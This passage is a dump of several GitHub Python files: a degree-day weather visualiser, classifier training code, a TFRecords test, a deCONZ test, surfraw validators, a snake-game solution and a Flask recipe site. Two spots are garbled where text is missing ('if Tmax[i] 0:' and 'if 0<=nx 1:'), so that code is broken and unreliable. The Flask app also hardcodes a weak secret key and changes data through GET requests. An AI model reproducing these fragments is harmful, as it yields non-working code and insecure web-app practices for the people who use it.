filename_list = []\n for i in csv.reader(f):\n for j in i:\n filename_list.append(j)\n if j is None: break\n if i is None: break\n return filename_list\ndef CalTempHoursInRanges(thresh1:float, thresh2, thresh3, thresh4, drybulb):\n Hour1, Hour2, Hour3, Hour4, Hour5 = 0, 0, 0, 0, 0\n for DBT 
in drybulb:\n if DBT < thresh1:\n Hour1 += 1\n elif DBT < thresh2:\n Hour2 += 1\n elif DBT < thresh3:\n Hour3 += 1\n elif DBT < thresh4:\n Hour4 += 1\n else:\n Hour5 += 1\n hourlist ={}\n hourlist[str(thresh1)]= Hour1\n hourlist[str(thresh2)] = Hour2\n hourlist[str(thresh3)] = Hour3\n hourlist[str(thresh4)] = Hour4\n return hourlist\ndef CddHddCal(drybulb, Tbase):\n '''\n This function calculates the cdd and hdd from hourly drybulb temperature, in this case, the hourly data are derived from epw files\n :param drybulb: the hourly drybulb temperature data\n :param Tbase: The base temperature to calculate the cdd hdd results\n :return: This function returns a dictionary of cdd and hdd results\n '''\n Hdd = 0.0\n Cdd = 0.0\n Tmax = []\n Tmin = []\n DegreeDay = {}\n for i in range(0,365):\n dailydb = []\n for j in range(0,24):\n dailydb.append(drybulb[i*24+j])\n Tmax.append(max(dailydb))\n Tmin.append(min(dailydb))\n #print (Tmax[i])\n if Tmin[i] > Tbase :\n Hdd += 0.0\n Cdd += (Tmax[i] +Tmin[i])/2.0 - Tbase\n elif (Tmin[i] + Tmax[i])/2.0 > Tbase:\n Hdd += (Tbase -Tmin[i])/4.0\n elif Tmax[i]>=Tbase:\n Hdd +=(Tbase-Tmin[i])/2.0-(Tmax[i]-Tbase)/4.0\n elif Tmax[i] < Tbase:\n Hdd += Tbase- (Tmax[i]+Tmin[i])/2.0\n\n if Tmax[i] 0:\n CZdata = re.findall('\"([^\"]*)\"', CZ)[0]\n for i in CZdata:\n if i.isdigit():\n if CZdata not in czlist:\n czlist.append(CZdata)\n Cdd[CZdata], Hdd[CZdata], Station[CZdata] = [],[] ,[]\n ##Parse the climate zone information in .stat, \n #and create new dictionaries for the climate zone\n \n LocCddDICT[location] = int(CddHddCal(drybulb, TempBaseline).get('Cdd'))\n LocHddDICT[location] = int(CddHddCal(drybulb, TempBaseline).get('Hdd'))\n ##Calculate the cdd and hdd for files with this information \n #and store the results in dictionaries\n \n Cdd[CZdata].append(LocCddDICT.get(location))\n Hdd[CZdata].append(LocHddDICT.get(location))\n Station[CZdata].append(location)\n ##Add the results to dictionaries by climate zones \n print('Reading and calculating ' + location+' done!')\n\n##put data into Pandas DataFrame and output to .csv files\nCddY, HddY, StationX,df = [],[],[],[]\nfor i in range(0,len(czlist)):\n CddY.append(Cdd.get(czlist[i]))\n HddY.append(Hdd.get(czlist[i]))\n StationX.append(Station.get(czlist[i]))\n Cddseries = Cdd.get(czlist[i])\n Hddseries = Hdd.get(czlist[i])\n StationSeries = pd.Series(StationX[i])\n dfitem = pd.DataFrame(dict(Cdd=Cddseries, Hdd=Hddseries), index=StationSeries)\n dfitemSort = dfitem.sort_values(by=['Hdd'])\n df.append( dfitemSort)\n dfitemSort.to_csv(path_or_buf='C:\\\\Users\\\\yueyue.zhou\\\\Desktop\\\\CddHdd-'+czlist[i]+'.csv')\nprint(df[2])\n'''\n\n##Read CddHdd files from .csv\n\npath = 'C:\\\\Users\\\\yueyue.zhou\\\\Desktop\\\\CddHddByClimateZone\\\\'\n\n#Read Climate Zone Names from FileNames, and put data to pds dataframe\nCZLs = os.listdir(path)\nCzList,df= [],[]\nHeaders = ['Station', 'Cdd','Hdd']\nfor FileName in CZLs:\n CZInf = FileName.split('-')[-1]\n CZ = CZInf.split('.')[0]\n CzList.append(CZ)\n #parse the filename to get Climatezone names only\n labels = []\n #put data to pds dataframe\n dfitem = pd.read_csv(path + FileName,skiprows = 1, names = Headers, index_col=0)\n\n #Acsending the data in df by hdd( or cdd)\n #dfitemSort = dfitem.sort_values(by=['Hdd'])\n dfitemSort = dfitem.sort_values(by=['Cdd'])\n\n StationList = dfitemSort.index.tolist()\n for station in StationList:\n label = station.split('_')[1:-1]\n label2 = '.'.join(label)[:'.'.join(label).rfind('.')]\n if label2 not in labels:\n labels.append(label2)\n 
else:\n dfitemSort = dfitemSort.drop(station)\n ##Read and parse the station name, drop the repeating stations\n\n\n LabelCol = pd.Series(labels,index = dfitemSort.index)\n dfitemSort['Label'] = LabelCol\n df.append(dfitemSort)\n\n##plot with Dash\napp = dash.Dash()\napp.layout = html.Div(children = [\n html.H1(children = 'HddCdd Data Visualization'),\n dcc.Graph(\n id='graph-with-slider'),\n html.Div(),\n dcc.Slider(\n id='ClimateZone-slider',\n min=1,\n max=len(CzList),\n value=1,\n step=1,\n marks={i: CzList[i-1] for i in range(1,len(CzList)+1)},\n included = False,\n )\n])\n\n@app.callback(\n dash.dependencies.Output('graph-with-slider', 'figure'),\n [dash.dependencies.Input('ClimateZone-slider', 'value')])\ndef update_figure(selected_CZ):\n filtered_df = df[selected_CZ-1]\n print(filtered_df)\n traces = []\n traces.append(go.Scatter(\n x= filtered_df['Label'],\n y= filtered_df['Cdd'],\n #text='Cooling Degree Days',\n #mode='markers',\n opacity=0.7,\n marker={\n 'size': 10,\n 'line': {'width': 0.5, 'color': 'white'}\n },\n name='Cooling Degree Days',\n ))\n traces.append(go.Scatter(\n x=filtered_df['Label'],\n y=filtered_df['Hdd'],\n #text='Heating Degree Days',\n #mode='markers',\n opacity=0.7,\n marker={\n 'size': 10,\n 'line': {'width': 0.5, 'color': 'white'}\n },\n name='Heating Degree Days',\n ))\n return {\n 'data': traces,\n 'layout': go.Layout(\n title = 'Hdd Cdd Data by Climate Zones',\n xaxis={'title': 'Station Name', 'autorange': True},\n yaxis={'title': 'Degree Days (Base Temperature: 65F)', 'autorange': True},\n margin={'l': 100, 'b': 250, 't': 50, 'r': 100},\n legend={'x': 0, 'y': 1.1},\n hovermode='closest',\n height = 800,\n )\n }\n\nif __name__ == '__main__':\n app.run_server()\n","repo_name":"yzhou601/cddhddvisualization","sub_path":"ReadWeatherData.py","file_name":"ReadWeatherData.py","file_ext":"py","file_size_in_byte":9458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26111500166","text":"from xgboost import XGBClassifier\nimport pandas as pd\nfrom os import path\nimport pickle\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.ensemble import RandomForestClassifier\n\n\nclass Model:\n test_size=0.2\n\n def __init__(self, model, name):\n self.model = model\n self.name = name\n\n def evaluate_model(self, X_train, y_train, X_test, y_test):\n y_pred_test = self.model.predict(X_test)\n y_pred_train = self.model.predict(X_train)\n test_accuracy = accuracy_score(y_test, y_pred_test)\n train_accuracy = accuracy_score(y_train, y_pred_train)\n print('Training accuracy: {0:.2f}, evaluation accuracy: {1:.2f}'.format(train_accuracy, test_accuracy))\n\n def fit(self, x_all, y_all):\n x_train, x_test, y_train, y_test = train_test_split(x_all, y_all, test_size=Model.test_size)\n self.model.fit(x_train, y_train)\n self.evaluate_model(x_train, y_train, x_test, y_test)\n\n def fit_all(self, x_all, y_all):\n self.model.fit(x_all, y_all)\n\n def save_model(self, path):\n pickle.dump(self.model, open(path + \"/ai_model_\" + self.name + \".pkl\", \"wb\"))\n\n\nclass LogisticModel(Model):\n def __init__(self):\n super().__init__(LogisticRegression(), \"logit\")\n\n\nclass XGB(Model):\n def __init__(self):\n super().__init__(XGBClassifier(n_estimators=1000), \"xgb\")\n\n def fit(self, x_all, y_all):\n x_train, x_test, y_train, y_test = train_test_split(x_all, 
y_all, test_size=Model.test_size)\n self.model.fit(x_train, y_train, eval_set = [[x_test, y_test]])\n self.evaluate_model(x_train, y_train, x_test, y_test)\n\n\nclass RandomForest(Model):\n def __init__(self):\n super().__init__(RandomForestClassifier(random_state=1,\n n_estimators=1000), \"forest\")\n\n\nclass MLP(Model):\n def __init__(self):\n super().__init__(MLPClassifier(solver='lbfgs',\n alpha=1e-5,\n hidden_layer_sizes=(28, 32, 5),\n random_state=1), \"mlp\")\n\n\nclass ModelVariant:\n def __init__(self, working_dir, vector_length, data_file_name):\n self.working_dir = working_dir\n self.vector_length = vector_length\n self.data_file_name = data_file_name\n\n def get_data_file_with_path(self):\n return path.join(self.working_dir, self.data_file_name)\n\n\ndef rebuild_models(variants):\n for variant in variants:\n\n features = [\"f\" + str(i) for i in range(0, variant.vector_length - 1)]\n label = [\"action\"]\n\n headers = features + label\n\n df = pd.read_csv(variant.get_data_file_with_path(),\n sep=',',\n header=None,\n names=headers)\n\n print(\"Dataset in {} consists of {} rows (vector length {})\".format(variant.working_dir, len(df), variant.vector_length))\n\n y_train_all = df[\"action\"]\n x_train_all = df.drop(columns=\"action\")\n\n # models = [RandomForest(), LogisticModel(), MLP(), XGB()]\n models = [MLP(), XGB()]\n\n for model in models:\n print(\"{} training started \".format(model.name))\n model.fit(x_train_all, y_train_all)\n model.save_model(variant.working_dir)\n print(\"model: {} - done \".format(model.name))\n\n\n# variants = [ModelVariant(\"4_frames/\", 108, \"train_human.csv\"),\n# ModelVariant(\"2_frames/\", 54, \"train_human.csv\"),\n# ModelVariant(\"1_frame/\", 27, \"train_human.csv\")]\n\nvariants = [ModelVariant(\"1_frame/\", 27, \"train_evo.csv\")]\n\n# variants = [ModelVariant(\"1_frame/\", 27, \"train_evo.csv\")]\n#\n# variants = [ModelVariant(\"1_frame/\", 27, \"train_human.csv\")]\n\nrebuild_models(variants)","repo_name":"maneo/letsplay","sub_path":"03_evolution/models/generate_models.py","file_name":"generate_models.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"21495013536","text":"import models.capacities as capacities\nimport tensorflow as tf\nimport numpy as np\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef write_to_tfrecords(feed_dict_list, filename):\n # Append filename extension\n filename = filename + '.tfrecords'\n\n # Define record writer\n writer = tf.python_io.TFRecordWriter(filename)\n\n # Iterate through feed dict list and write to file\n for example_dict in feed_dict_list:\n # Convert dict entries to features\n feature = {}\n for key in example_dict.keys():\n feat = example_dict[key][0].astype(np.int32)\n feature[key.op.name] = _bytes_feature(tf.compat.as_bytes(feat.tostring()))\n\n # Create example protocol buffer\n example = tf.train.Example(features=tf.train.Features(feature=feature))\n\n # Serialise to string and write to file\n writer.write(example.SerializeToString())\n\n # Close writer\n writer.close()\n\n\ndef read_from_tfrecords(filename_list, feature_size_dict, num_epochs=1, batch_size=8, capacity=32,\n num_threads=1, min_after_dequeue=8):\n # Create feature dict to be populated\n feature = {}\n for key in feature_size_dict.keys():\n feature[key] = 
tf.FixedLenFeature([], tf.string)\n\n # Create queue from filename list\n filename_queue = tf.train.string_input_producer(filename_list, num_epochs=num_epochs)\n\n # Define reader\n reader = tf.TFRecordReader()\n\n # Read next record\n _, serialized_example = reader.read(filename_queue)\n\n # Decode record\n features = tf.parse_single_example(serialized_example, features=feature)\n\n # Convert strings back to numbers\n tensor_list = []\n for key in features.keys():\n tensor = tf.decode_raw(features[key], tf.int32)\n\n # Reshape\n tensor = tf.reshape(tensor, feature_size_dict[key])\n\n # Append to tensor list\n tensor_list.append(tensor)\n\n # Create batches by randomly shuffling tensors\n batch = tf.train.shuffle_batch(tensor_list, batch_size=batch_size, capacity=capacity, num_threads=num_threads,\n min_after_dequeue=min_after_dequeue)\n\n return batch\n\n\nplaceholders = {\"question\": tf.placeholder(tf.int32, [None, None], name=\"question\"),\n \"question_lengths\": tf.placeholder(tf.int32, [None], name=\"question_lengths\"),\n \"candidates\": tf.placeholder(tf.int32, [None, None], name=\"candidates\"),\n \"support\": tf.placeholder(tf.int32, [None, None, None], name=\"support\"),\n \"support_lengths\": tf.placeholder(tf.int32, [None, None], name=\"support_lengths\"),\n \"answers\": tf.placeholder(tf.int32, [None], name=\"answers\"),\n \"targets\": tf.placeholder(tf.int32, [None, None], name=\"targets\")}\n\nkbp_feed_dicts, _ = capacities.load_data(placeholders, 1, source='kbp', data_type='small_train')\n\nfilename = 'data/tfrecords_test'\n\n# Get sizes\nfeature_size_dict = {}\nfor key in kbp_feed_dicts[0].keys():\n key_name = key.op.name\n size = kbp_feed_dicts[0][key][0].shape\n if size == ():\n feature_size_dict[key_name] = (1,)\n else:\n feature_size_dict[key_name] = size\n\n# Test writing to tfrecords file\nwrite_to_tfrecords(kbp_feed_dicts, filename)\n\nkbp_feed_dicts = None\nkbp_train_data = None\nvocab = None\n\n# Test reading from tfrecords file to make sure everything is fine\nfilename_list = [filename + '.tfrecords']\n\nbatch = read_from_tfrecords(filename_list, feature_size_dict)\n\nwith tf.Session() as sess:\n # Define and run init op\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n sess.run(init_op)\n\n summary_writer = tf.summary.FileWriter('results\\\\tfrecords_experiments\\\\', sess.graph)\n summary_writer.add_graph(sess.graph)\n\n # Create coordinator and queue runner objects\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n for _ in range(10):\n test = sess.run(batch)\n\n print(len(kbp_train_data))\n","repo_name":"RoganInglis/MastersProject","sub_path":"tests/tfrecords_experiments.py","file_name":"tfrecords_experiments.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"27425694374","text":"from typing import Dict, Optional\n\nimport pytest\nfrom appdaemon.plugins.hass.hassapi import Hass\nfrom cx_core.controller import Controller\nfrom cx_core.integration.deconz import DeCONZIntegration\nfrom pytest_mock.plugin import MockerFixture\n\nfrom tests.test_utils import wrap_execution\n\n\n@pytest.mark.parametrize(\n \"data, type, expected\",\n [\n (\n {\"id\": 123, \"event\": 1002},\n None,\n 1002,\n ),\n (\n {\"id\": 123, \"gesture\": 2},\n \"gesture\",\n 2,\n ),\n ],\n)\nasync def test_callback(\n fake_controller: Controller,\n mocker: MockerFixture,\n data: Dict[str, int],\n type: 
Optional[str],\n expected: str,\n) -> None:\n handle_action_patch = mocker.patch.object(fake_controller, \"handle_action\")\n kwargs = {}\n if type is not None:\n kwargs[\"type\"] = type\n deconz_integration = DeCONZIntegration(fake_controller, kwargs)\n await deconz_integration.event_callback(\"test\", data, {})\n handle_action_patch.assert_called_once_with(expected, extra=data)\n\n\n@pytest.mark.parametrize(\n \"listen_to, expected_id\",\n [\n (\"id\", \"id\"),\n (\"unique_id\", \"unique_id\"),\n (None, \"id\"),\n (\"fake\", None),\n ],\n)\nasync def test_listen_changes(\n fake_controller: Controller,\n mocker: MockerFixture,\n listen_to: Optional[str],\n expected_id: Optional[str],\n) -> None:\n kwargs = {}\n if listen_to is not None:\n kwargs[\"listen_to\"] = listen_to\n\n listen_event_mock = mocker.patch.object(Hass, \"listen_event\")\n deconz_integration = DeCONZIntegration(fake_controller, kwargs)\n\n with wrap_execution(error_expected=expected_id is None, exception=ValueError):\n await deconz_integration.listen_changes(\"controller_id\")\n\n if expected_id is not None:\n listen_event_mock.assert_called_once_with(\n fake_controller,\n deconz_integration.event_callback,\n \"deconz_event\",\n **{expected_id: \"controller_id\"}\n )\n","repo_name":"xaviml/controllerx","sub_path":"tests/unit_tests/cx_core/integration/deconz_test.py","file_name":"deconz_test.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":301,"dataset":"github-code","pt":"44"} +{"seq_id":"22126932205","text":"from __future__ import annotations\n\nimport re\nfrom typing import TYPE_CHECKING, Callable, List, TypeVar, cast\n\nif TYPE_CHECKING:\n from typing_extensions import Final\n\n\nclass OptionParseError(Exception):\n \"\"\"Exception when options are given incorrect arguments.\"\"\"\n\n\nclass OptionResolutionError(Exception):\n \"\"\"Exception when resolving options' targets to concrete objects fails.\"\"\"\n\n\n# NAME\n\n# This is purposely not in the full range of shell variable names because I am\n# trying to encourage a particular naming convention. 
That is,\n# `SURFRAW_elvisname_onewordvar` is what the script would generate.\n_VALID_SURFRAW_VAR_NAME: Final = re.compile(\"^[a-z]+$\")\n\n\ndef validate_name(name: str) -> str:\n \"\"\"Return `name` unchanged if it is valid for inclusion in elvi.\n\n Raises `OptionParseError` on invalid input.\n \"\"\"\n if not _VALID_SURFRAW_VAR_NAME.fullmatch(name):\n raise OptionParseError(\n f\"name '{name}' is an invalid variable name for an elvis\"\n )\n return name\n\n\n# YES-NO\n\n# TODO: Should the yes-no option take the other forms?\n# TRUE_WORDS = {\"yes\", \"on\", \"1\"}\n# FALSE_WORDS = {\"no\", \"off\", \"0\"}\n_TRUE_WORDS: Final = {\"yes\"}\n_FALSE_WORDS: Final = {\"no\"}\n_BOOL_WORDS: Final = _TRUE_WORDS | _FALSE_WORDS\n\n\ndef validate_bool(bool_: str) -> str:\n \"\"\"Return `bool_` unchanged if it is a word representing a boolean.\n\n Raises `OptionParseError` on invalid input.\n \"\"\"\n if bool_ not in _BOOL_WORDS:\n valid_bools = \", \".join(sorted(_BOOL_WORDS))\n raise OptionParseError(\n f\"bool '{bool_}' must be one of the following: {valid_bools}\"\n )\n return bool_\n\n\ndef parse_bool(bool_: str) -> bool:\n \"\"\"Map boolean words to `True` or `False`.\n\n Raises `OptionParseError` on invalid input.\n \"\"\"\n if bool_ in _TRUE_WORDS:\n return True\n elif bool_ in _FALSE_WORDS:\n return False\n else:\n valid_bools = \", \".join(sorted(_BOOL_WORDS))\n raise OptionParseError(\n f\"bool '{bool_}' must be one of the following: {valid_bools}\"\n )\n\n\n# OPTION TYPES is defined elsewhere to avoid circular imports.\n\n# ENUM VALUES\n\n_VALID_ENUM_VALUE_STR: Final = \"^[a-z0-9][a-z0-9_+-]*$\"\n_VALID_ENUM_VALUE: Final = re.compile(_VALID_ENUM_VALUE_STR)\n\n\ndef validate_enum_value(value: str) -> str:\n \"\"\"Return `value` unchanged if it is valid for surfraw enums.\n\n Technically, anything is valid for surfraw enums, but *our* enums are\n restricted since it makes life a bit easier.\n\n Raises `OptionParseError` on invalid input.\n \"\"\"\n if not _VALID_ENUM_VALUE.fullmatch(value):\n raise OptionParseError(\n f\"enum value '{value}' must match the regex '{_VALID_ENUM_VALUE_STR}'\"\n )\n return value\n\n\n# MISC.\n\n\ndef no_validation(arg: str) -> str:\n \"\"\"Return `arg` unchanged.\n\n This is an identity function and raises no exceptions.\n \"\"\"\n return arg\n\n\nT = TypeVar(\"T\")\n\n\ndef list_of(validator: Callable[[str], T]) -> Callable[[str], List[T]]:\n \"\"\"Run `validator` on a comma-delimited list of arguments.\"\"\"\n\n def list_validator(arg: str) -> List[T]:\n if arg == \"\":\n return []\n values = arg.split(\",\")\n # In case the validators return a different object from its input (i.e., parsers).\n for i, value in enumerate(values):\n # Mutating it is fine here.\n values[i] = validator(value) # type: ignore\n return cast(List[T], values)\n\n return list_validator\n","repo_name":"Hoboneer/surfraw-tools","sub_path":"surfraw_tools/lib/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"44"} +{"seq_id":"30559684164","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\n\r\n# n * n 배열을 모두 0으로 초기화\r\nn = int(input())\r\nboard = [[0]*n for _ in range(n)]\r\n\r\n# 사과가 있는 자리는 모두 1로 표시\r\nk = int(input())\r\nfor k in range(k):\r\n x, y = map(int,input().split())\r\n board[x-1][y-1] = 1\r\n\r\n# 방향 변경 정보를 입력받아 저장\r\ndirection = deque()\r\nl = int(input())\r\nfor i in range(l):\r\n t, d = input().split()\r\n 
direction.append((t,d))\r\n\r\n# 다음 변경 시간과, 변경 방향\r\nchange_t, change_d = direction.popleft()\r\n\r\n\r\n# 위, 왼, 아래, 오\r\ndx = [-1,0,1,0]\r\ndy = [0,-1,0,1]\r\n\r\n# 경과시간은 0, 현재방향은 오른쪽으로 초기화\r\ntime = 0\r\ndirect = 3\r\n\r\n# 뱀의 몸이 지나간 좌표를 차례대로 저장\r\n# 꼬리 길이를 줄여야할 때 사용하기 위함\r\nsnake = deque()\r\nsnake.append((0,0))\r\n\r\nx, y = 0, 0\r\nwhile True:\r\n\r\n # 경과시간을 증가시켜준다.\r\n time += 1\r\n\r\n # 뱀이 바라보고 있는 좌표로 이동\r\n nx, ny = x + dx[direct], y + dy[direct]\r\n\r\n # 리스트 범위 벗어나는지 체크\r\n if 0<=nx 1:\r\n break\r\n # 이동하려고 하는 좌표가 범위를 벗어나면 종료한다.\r\n else:\r\n break\r\n\r\n # 방향을 변경해야 한다면, 변경한다.\r\n if time == int(change_t):\r\n if change_d == 'D':\r\n if direct > 0:\r\n direct -= 1\r\n else:\r\n direct = 3\r\n elif change_d == 'L':\r\n if direct < 3:\r\n direct += 1\r\n else:\r\n direct =0\r\n if len(direction) > 0:\r\n change_t, change_d = direction.popleft()\r\n else:\r\n change_t = 0\r\n\r\n# 결과 출력\r\nprint(time)\r\n \r\n","repo_name":"caboooom/Algorithm","sub_path":"백준/Gold/3190. 뱀/뱀.py","file_name":"뱀.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22964103237","text":"from setuptools import find_packages, setup\nfrom glob import glob\nimport os\n\n\npackage_name = 'referee_console'\n\ndata_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml'])\n ]\n\nsetup(\n name=package_name,\n version='0.0.1',\n packages=find_packages(exclude=['test']),\n data_files=data_files,\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='Vitalii Kudinov',\n maintainer_email='v.kudinov@g.nsu.ru',\n description='Referee console for Autorace 2023',\n license='Apache 2.0',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'mission_autorace_2023_referee = referee_console.mission_autorace_2023_referee:main'\n ],\n },\n)\n","repo_name":"psan3333/Robotics_course","sub_path":"autorace/my_robot/referee_console/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28820069152","text":"from flask import Flask, render_template, request, redirect, flash, url_for\r\nfrom flask_bootstrap import Bootstrap\r\nfrom flask_moment import Moment\r\nfrom flask_wtf import FlaskForm\r\nfrom wtforms import StringField, SubmitField, PasswordField, BooleanField, Label, TextAreaField\r\nfrom wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom flask_bcrypt import Bcrypt\r\nfrom flask_login import LoginManager, UserMixin, login_user, current_user, logout_user, login_required\r\nfrom flask_migrate import Migrate\r\n\r\napp = Flask(__name__)\r\napplication = app\r\napp.config['SECRET_KEY'] = 'hard to guess string'\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///community.db'\r\nbcrypt = Bcrypt(app)\r\ndb = SQLAlchemy(app)\r\nmigrate = Migrate(app, db) # this\r\nlogin_manager = LoginManager(app)\r\nlogin_manager.login_view = 'login'\r\nlogin_manager.login_message_category = 'info'\r\n\r\n\r\nclass User(db.Model, UserMixin):\r\n id = db.Column(db.Integer, primary_key=True)\r\n username = db.Column(db.String(30), unique=True, nullable=False)\r\n email = db.Column(db.String(120), unique=True, nullable=False)\r\n password = db.Column(db.String(60), nullable=False)\r\n recipes = db.relationship('Recipe', backref='author', 
lazy=True)\r\n\r\n def __repr__(self):\r\n return f\"User('{self.username}',{self.email}')\"\r\n\r\nclass Comment(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n title = db.Column(db.String(120), nullable=False)\r\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\r\n username = db.Column(db.String(30), nullable=False)\r\n recipe_id = db.Column(db.Integer, db.ForeignKey('recipe.id'), nullable=False)\r\n description = db.Column(db.String(65535), nullable=False)\r\n\r\n def __repr__(self):\r\n return f\"Comment('{self.title}')\"\r\n\r\n\r\nclass Recipe(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n title = db.Column(db.String(120), nullable=False)\r\n description = db.Column(db.String(65535), nullable=False)\r\n ingredients = db.Column(db.String(65535), nullable=False)\r\n instructions = db.Column(db.String(65535), nullable=False)\r\n notes = db.Column(db.String(65535), nullable=False)\r\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\r\n like = db.Column(db.Integer, default=0, nullable=False)\r\n dislike = db.Column(db.Integer, default=0, nullable=False)\r\n\r\n def __repr__(self):\r\n return f\"Post('{self.title}')\"\r\n\r\n\r\nclass RegistrationForm(FlaskForm):\r\n username = StringField('Username', validators=[DataRequired(), Length(min=3, max=30)])\r\n email = StringField('Email', validators=[DataRequired(), Email()])\r\n password = PasswordField('Password', validators=[DataRequired()])\r\n confirm_password = PasswordField('Confirm Password', validators=[DataRequired(), EqualTo('password')])\r\n submit = SubmitField('Sign up')\r\n\r\n def validate_username(self, username):\r\n user = User.query.filter_by(username=username.data).first()\r\n if user:\r\n raise ValidationError('Username already exists.')\r\n\r\n def validate_email(self, email):\r\n user = User.query.filter_by(email=email.data).first()\r\n if user:\r\n raise ValidationError('Email already exists.')\r\n\r\n\r\nclass LoginForm(FlaskForm):\r\n email = StringField('Email', validators=[DataRequired(), Email()])\r\n password = PasswordField('Password', validators=[DataRequired()])\r\n remember = BooleanField('Remember Me')\r\n submit = SubmitField('Sign in')\r\n\r\n\r\nclass CommentForm(FlaskForm):\r\n title = StringField('Title for your comment:', validators=[DataRequired()])\r\n description = TextAreaField('Enter you comment here:', validators=[DataRequired()])\r\n submit = SubmitField('Add Comment')\r\n\r\nclass RecipeForm(FlaskForm):\r\n title = StringField('Title for your recipe', validators=[DataRequired()])\r\n description = TextAreaField('Enter a description', validators=[DataRequired()])\r\n ingredients = TextAreaField('Enter ingredients one on each line', validators=[DataRequired()])\r\n instructions = TextAreaField('Enter instructions one on each line', validators=[DataRequired()])\r\n notes = TextAreaField('Wanna brag?', validators=[DataRequired()])\r\n submit = SubmitField('Add Recipe')\r\n\r\n def __init__(self, mode=None, **kwargs):\r\n super().__init__(**kwargs)\r\n if mode is not None:\r\n # Update labels based on the mode the form is opened!\r\n self.submit.label = Label(self.submit.id, \"Update existing recipe\")\r\n self.title.label = Label(self.title.id, \"Update recipe name?\")\r\n self.description.label = Label(self.title.id, \"Update description?\")\r\n self.ingredients.label = Label(self.title.id, \"Update ingredients?\")\r\n self.instructions.label = Label(self.title.id, \"Update instructions?\")\r\n self.notes.label = 
Label(self.title.id, \"Update notes?\")\r\n\r\n\r\nbootstrap = Bootstrap(app)\r\nmoment = Moment(app)\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n return User.query.get(int(user_id))\r\n\r\n\r\n@app.errorhandler(404)\r\ndef page_not_found(e):\r\n return render_template('404.html'), 404\r\n\r\n\r\n@app.errorhandler(500)\r\ndef internal_server_error(e):\r\n return render_template('500.html'), 500\r\n\r\n\r\n@app.route('/')\r\n@app.route('/home')\r\ndef home():\r\n recipes = Recipe.query.order_by(Recipe.like.desc()).all()\r\n comments = Comment.query.all()\r\n return render_template('index.html', recipes=recipes, comments=comments)\r\n\r\n\r\n@app.route('/register', methods=['GET', 'POST'])\r\ndef register():\r\n if current_user.is_authenticated:\r\n return redirect(url_for('home'))\r\n form = RegistrationForm()\r\n if form.validate_on_submit():\r\n hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')\r\n user = User(username=form.username.data, email=form.email.data, password=hashed_password)\r\n db.session.add(user)\r\n db.session.commit()\r\n flash('Welcome to our community! You can now login.', 'success')\r\n return redirect(url_for('login'))\r\n return render_template('register.html', form=form)\r\n\r\n\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n if current_user.is_authenticated:\r\n return redirect(url_for('home'))\r\n form = LoginForm()\r\n if form.validate_on_submit():\r\n user = User.query.filter_by(email=form.email.data).first()\r\n if user and bcrypt.check_password_hash(user.password, form.password.data):\r\n login_user(user)\r\n flash(f'Login succeeded. Welcome! {user.username} .', 'success')\r\n return redirect(url_for('home'))\r\n else:\r\n flash('Login failed, please check your email and password.', 'danger')\r\n return render_template('login.html', form=form)\r\n\r\n\r\n@app.route('/logout')\r\ndef logout():\r\n logout_user()\r\n return redirect(url_for('home'))\r\n\r\n\r\n@app.route('/account')\r\n@login_required\r\ndef account():\r\n return render_template('account.html', title='Account')\r\n\r\n@app.route('/comment', methods=['POST', 'GET'])\r\n@login_required\r\ndef comment():\r\n user = User.query.filter_by(username=current_user.username).first()\r\n form = CommentForm()\r\n if form.validate_on_submit():\r\n recipe_id = request.args.get('recipe_id')\r\n new_comment=Comment(title=form.title.data, user_id=user.id, username=user.username, description=form.description.data, recipe_id=recipe_id)\r\n db.session.add(new_comment)\r\n db.session.commit()\r\n flash('Comment added successfully.', 'success')\r\n return redirect(url_for('home'))\r\n return render_template('comment.html', form=form)\r\n\r\n@app.route('/like', methods=['GET'])\r\n@login_required\r\ndef like():\r\n recipe_id = request.args.get('recipe_id')\r\n recipe = Recipe.query.filter_by(id=recipe_id).first()\r\n new_like = recipe.like+1\r\n recipe.like = new_like\r\n db.session.commit()\r\n recipes = Recipe.query.order_by(Recipe.like.desc()).all()\r\n comments = Comment.query.all()\r\n return render_template('index.html', recipes=recipes, comments=comments)\r\n\r\n@app.route('/dislike', methods=['GET'])\r\n@login_required\r\ndef dislike():\r\n recipe_id = request.args.get('recipe_id')\r\n recipe = 